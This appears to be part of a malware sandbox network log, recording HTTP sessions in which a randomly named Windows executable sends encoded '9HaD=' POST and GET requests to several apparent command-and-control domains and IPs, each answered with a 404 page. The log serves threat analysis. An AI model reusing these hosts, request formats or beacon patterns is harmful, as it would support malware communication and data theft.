                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                            Nov 24, 2024 08:14:47.154863119 CET | 253 | IN | Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            14 | 192.168.2.10 | 49988 | 107.167.84.42 | 80 | 6048 | C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 24, 2024 08:14:48.589859962 CET | 687 | OUT | POST /bw18/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.cssa.auction
                                                            Origin: http://www.cssa.auction
                                                            Referer: http://www.cssa.auction/bw18/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 217
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Ascii: 9HaD=hjimBMuRtczTRtONtBhpvSLHiLZ4hChQRKp8aBoau+6O53lev+W7mGqw4MGxvMjF4ZwNDn4EDd/9oRTAJ+z9uppaElhe8nPb6HiB8jdU2kirypXQIJsEaVOuO80SWpuhEAEz4jTW1h9IzmR6OQpmpshvS5iWf5u/yR20x31yMf37hGUSu2WxGsBFFtGZW9HFqBxY3idrZ5AxpJcftg==
                                                            Nov 24, 2024 08:14:49.821301937 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                            Connection: close
                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                            pragma: no-cache
                                                            content-type: text/html
                                                            content-length: 1251
                                                            date: Sun, 24 Nov 2024 07:14:49 GMT
                                                            server: LiteSpeed
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                            Nov 24, 2024 08:14:49.821337938 CET | 253 | IN | Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            15 | 192.168.2.10 | 49989 | 107.167.84.42 | 80 | 6048 | C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 24, 2024 08:14:51.263487101 CET | 1700 | OUT | POST /bw18/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.cssa.auction
                                                            Origin: http://www.cssa.auction
                                                            Referer: http://www.cssa.auction/bw18/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1229
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Ascii: 9HaD= [TRUNCATED]
                                                            Nov 24, 2024 08:14:52.450073004 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                            Connection: close
                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                            pragma: no-cache
                                                            content-type: text/html
                                                            content-length: 1251
                                                            date: Sun, 24 Nov 2024 07:14:52 GMT
                                                            server: LiteSpeed
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                            Nov 24, 2024 08:14:52.450131893 CET | 224 | IN | Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this s
                                                            Nov 24, 2024 08:14:52.450161934 CET | 29 | IN | Data Ascii: ite.</p></div></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            16 | 192.168.2.10 | 49990 | 107.167.84.42 | 80 | 6048 | C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 24, 2024 08:14:53.929368973 CET | 400 | OUT | GET /bw18/?9HaD=shKGC8bK6vrLacDTgBZk6Rr0hJ1HgilraKgFYlsRqeuAlXFl2di5oGGCrfCVn8Xiw6EWTnMqBe6emh6gDO/8taYQfWAt8ESD/mKf9DNdyFPR+ujYTQ==&wdv4=1RD4 HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.cssa.auction
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Nov 24, 2024 08:14:55.212100983 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                            Connection: close
                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                            pragma: no-cache
                                                            content-type: text/html
                                                            content-length: 1251
                                                            date: Sun, 24 Nov 2024 07:14:55 GMT
                                                            server: LiteSpeed
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                            Nov 24, 2024 08:14:55.212182999 CET | 253 | IN | Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            17 | 192.168.2.10 | 49991 | 209.74.77.108 | 80 | 6048 | C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 24, 2024 08:15:01.068685055 CET | 675 | OUT | POST /chlo/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.urbanxplore.info
                                                            Origin: http://www.urbanxplore.info
                                                            Referer: http://www.urbanxplore.info/chlo/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 193
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Ascii: 9HaD=bLUvgTF3k7eOhOCT96+CwmuDW/i/bUQORfEqbTSM8Tw43bmDx3vm9Jir4EUvDxRsGHBuyXSftQBkYZ+U3ZYGATCRutvtK2V9PupbZCF/j2ipxhgEcmAFPdBw6TSP4XLBJSSYdwtV8aWABBjRlwFIM9SZ78gRjZZddRGUkJApiK/MKeRQ465TnjlyESNo
                                                            Nov 24, 2024 08:15:02.331581116 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                            Date: Sun, 24 Nov 2024 07:15:02 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            18 | 192.168.2.10 | 49992 | 209.74.77.108 | 80 | 6048 | C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 24, 2024 08:15:03.728972912 CET | 699 | OUT | POST /chlo/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.urbanxplore.info
                                                            Origin: http://www.urbanxplore.info
                                                            Referer: http://www.urbanxplore.info/chlo/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 217
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Ascii: 9HaD=bLUvgTF3k7eOhuyT4b+C2GuAPPi/NkQCRf4qbSGi9gU435uDw1Hm6JirwkVlehRjGHNmyS6ftUhkYZOU3qgFBDCflNvvHWV9PupbZCQUj2KpxT0EOTgKD9B3wzSPpHLFJSS6dyYA8YeABATRlhE6G9Sf1ch8uq0ycgiHq7ER/Yz2J/sXprYE0U58KU4C6IRRa5MsosctoBmGFUC1yA==
                                                            Nov 24, 2024 08:15:05.065916061 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                            Date: Sun, 24 Nov 2024 07:15:04 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            19 | 192.168.2.10 | 49993 | 209.74.77.108 | 80 | 6048 | C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 24, 2024 08:15:06.389189005 CET | 1712 | OUT | POST /chlo/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.urbanxplore.info
                                                            Origin: http://www.urbanxplore.info
                                                            Referer: http://www.urbanxplore.info/chlo/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1229
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Raw: 39 48 61 44 3d 62 4c 55 76 67 54 46 33 6b 37 65 4f 68 75 79 54 34 62 2b 43 32 47 75 41 50 50 69 2f 4e 6b 51 43 52 66 34 71 62 53 47 69 39 67 63 34 33 4c 57 44 78 53 7a 6d 37 4a 69 72 36 45 56 6d 65 68 52 45 47 48 56 69 79 53 32 6c 74 53 74 6b 5a 34 75 55 37 4c 67 46 55 54 43 66 71 74 76 69 4b 32 55 6c 50 75 34 53 5a 43 41 55 6a 32 4b 70 78 54 59 45 4e 47 41 4b 42 39 42 77 36 54 53 54 34 58 4c 39 4a 53 61 51 64 78 30 51 39 6f 2b 41 43 67 44 52 69 54 63 36 62 4e 53 64 34 38 68 6b 75 71 34 74 63 67 2b 31 71 36 67 33 2f 61 6a 32 4b 71 42 31 35 4a 59 31 75 31 42 2b 4a 58 63 6a 39 50 45 34 57 4c 31 61 6c 4e 4d 74 77 41 48 33 47 46 7a 74 68 37 2f 30 42 77 73 6e 35 74 31 38 49 63 36 42 66 50 65 32 66 49 63 6c 78 6c 67 78 54 46 34 77 57 76 4f 77 35 57 79 45 76 57 64 74 62 37 34 4b 79 6a 36 4c 37 53 76 4f 37 68 38 73 75 74 63 64 57 55 30 2b 65 67 56 79 68 77 6e 2f 6e 46 37 43 63 31 37 39 5a 6d 6b 34 68 6d 72 42 4c 56 77 62 4c 52 75 48 2f 4e 41 74 55 41 6c 5a 44 5a 70 4d 63 62 48 43 4b 46 58 42 65 77 32 52 31 [TRUNCATED]
                                                            Data Ascii: 9HaD=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 [TRUNCATED]
                                                            Nov 24, 2024 08:15:07.607530117 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                            Date: Sun, 24 Nov 2024 07:15:07 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            20 | 192.168.2.10 | 49994 | 209.74.77.108 | 80 | 6048 | C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 24, 2024 08:15:09.061122894 CET | 404 | OUT | GET /chlo/?9HaD=WJ8Pjkl58Iqvi8v+346A7W2JCurCP35uavULUkOWxAdWurHwpVHOzp+Wq3EHGCpSI2RFmnu5nAtTba/o9p0CIyXXw9XhC0V5AfBtSRheiGahxikEfA==&wdv4=1RD4 HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.urbanxplore.info
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Nov 24, 2024 08:15:10.272936106 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                            Date: Sun, 24 Nov 2024 07:15:10 GMT
                                                            Server: Apache
                                                            Content-Length: 389
                                                            Connection: close
                                                            Content-Type: text/html; charset=utf-8
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            21 | 192.168.2.10 | 49995 | 104.21.44.16 | 80 | 6048 | C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 24, 2024 08:15:15.848953962 CET | 690 | OUT | POST /stfe/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.3kw40881107247y.click
                                                            Origin: http://www.3kw40881107247y.click
                                                            Referer: http://www.3kw40881107247y.click/stfe/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 193
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Raw: 39 48 61 44 3d 44 54 43 34 31 41 43 77 64 38 2b 6b 7a 32 6e 38 35 62 71 47 52 71 48 30 75 4b 2b 52 38 69 69 66 34 6e 4e 34 65 44 33 4b 56 57 70 79 43 70 77 63 51 4b 63 33 42 6b 34 55 75 52 38 4a 37 57 6a 49 34 35 6f 52 4f 71 2f 6e 66 58 35 4e 55 51 74 61 47 45 73 42 47 65 4a 39 48 42 46 76 48 2b 59 74 64 52 43 4b 31 49 65 6b 70 63 64 74 68 49 57 79 6c 34 70 61 36 62 34 6f 7a 53 5a 2b 59 51 35 75 34 78 55 42 51 6a 74 36 77 2b 47 6d 5a 74 33 61 79 32 2b 41 45 33 4c 6f 4a 45 38 57 6e 2f 32 4f 43 7a 4c 78 52 48 68 42 31 66 49 5a 47 39 63 44 77 69 44 4e 58 53 54 78 34 46 66 57
                                                            Data Ascii: 9HaD=DTC41ACwd8+kz2n85bqGRqH0uK+R8iif4nN4eD3KVWpyCpwcQKc3Bk4UuR8J7WjI45oROq/nfX5NUQtaGEsBGeJ9HBFvH+YtdRCK1IekpcdthIWyl4pa6b4ozSZ+YQ5u4xUBQjt6w+GmZt3ay2+AE3LoJE8Wn/2OCzLxRHhB1fIZG9cDwiDNXSTx4FfW
                                                            Nov 24, 2024 08:15:16.991203070 CET | 899 | IN | HTTP/1.1 404 Not Found
                                                            Date: Sun, 24 Nov 2024 07:15:16 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=56iRVz82rYHHYtPbfv%2FJ1bfWXhYdXV4SfXyvSQDenMWt5waNgekkwIeY9WEA8C4%2BIXINiuyNmTncsLK6M7b2DkloPDvWN09mejHPX7zICGnL5uwYnuD9c8mvW%2Fb99gBnKv7Gr%2BwrLnaLkoDn"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8e779b5e0bc48c72-EWR
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1773&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=690&delivery_rate=0&cwnd=163&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            22 | 192.168.2.10 | 49996 | 104.21.44.16 | 80 | 6048 | C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Nov 24, 2024 08:15:18.515841961 CET | 714 | OUT | POST /stfe/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                            Accept-Encoding: gzip, deflate
                                                            Accept-Language: en-US,en;q=0.5
                                                            Host: www.3kw40881107247y.click
                                                            Origin: http://www.3kw40881107247y.click
                                                            Referer: http://www.3kw40881107247y.click/stfe/
                                                            Cache-Control: max-age=0
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 217
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                            Data Raw: 39 48 61 44 3d 44 54 43 34 31 41 43 77 64 38 2b 6b 78 58 58 38 31 63 65 47 46 36 48 37 69 71 2b 52 31 43 69 62 34 6e 42 34 65 48 4f 53 55 6b 4e 79 43 4a 41 63 43 62 63 33 47 6b 34 55 33 68 38 32 31 32 69 4b 34 35 73 7a 4f 72 44 6e 66 58 46 4e 55 52 64 61 47 54 41 43 48 4f 4a 37 53 52 46 74 59 75 59 74 64 52 43 4b 31 49 4c 42 70 63 46 74 68 35 6d 79 6b 5a 70 5a 35 62 34 72 30 53 5a 2b 63 51 35 69 34 78 55 7a 51 69 77 66 77 38 75 6d 5a 6f 54 61 79 6a 53 44 4b 33 4c 79 4e 45 39 43 30 2b 65 48 4d 6d 6e 66 65 45 4a 67 6f 5a 73 50 49 38 68 45 68 7a 69 61 45 6c 50 2f 32 44 71 38 36 52 57 43 75 42 73 34 66 4c 6c 54 63 4d 4d 62 4c 47 31 49 4e 51 3d 3d
                                                            Data Ascii: 9HaD=DTC41ACwd8+kxXX81ceGF6H7iq+R1Cib4nB4eHOSUkNyCJAcCbc3Gk4U3h8212iK45szOrDnfXFNURdaGTACHOJ7SRFtYuYtdRCK1ILBpcFth5mykZpZ5b4r0SZ+cQ5i4xUzQiwfw8umZoTayjSDK3LyNE9C0+eHMmnfeEJgoZsPI8hEhziaElP/2Dq86RWCuBs4fLlTcMMbLG1INQ==
                                                            Nov 24, 2024 08:15:19.655185938 CET | 897 | IN | HTTP/1.1 404 Not Found
                                                            Date: Sun, 24 Nov 2024 07:15:19 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8FmxdIQ3pf%2Bq5HA%2BoI9X3Qd3lvwSWkusOaGqom8JdMb5mwbpWnNtPVoo8VwzzX8u5i5LeE8PFEfun6Fx9gZEkbn7P%2Bnca9oGo94MooRAvj7gRmwcBiFMog3J5oUNuegDseD34ndOQSKDXVz0"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8e779b6ebe935e7d-EWR
                                                            Content-Encoding: gzip
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1547&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=714&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
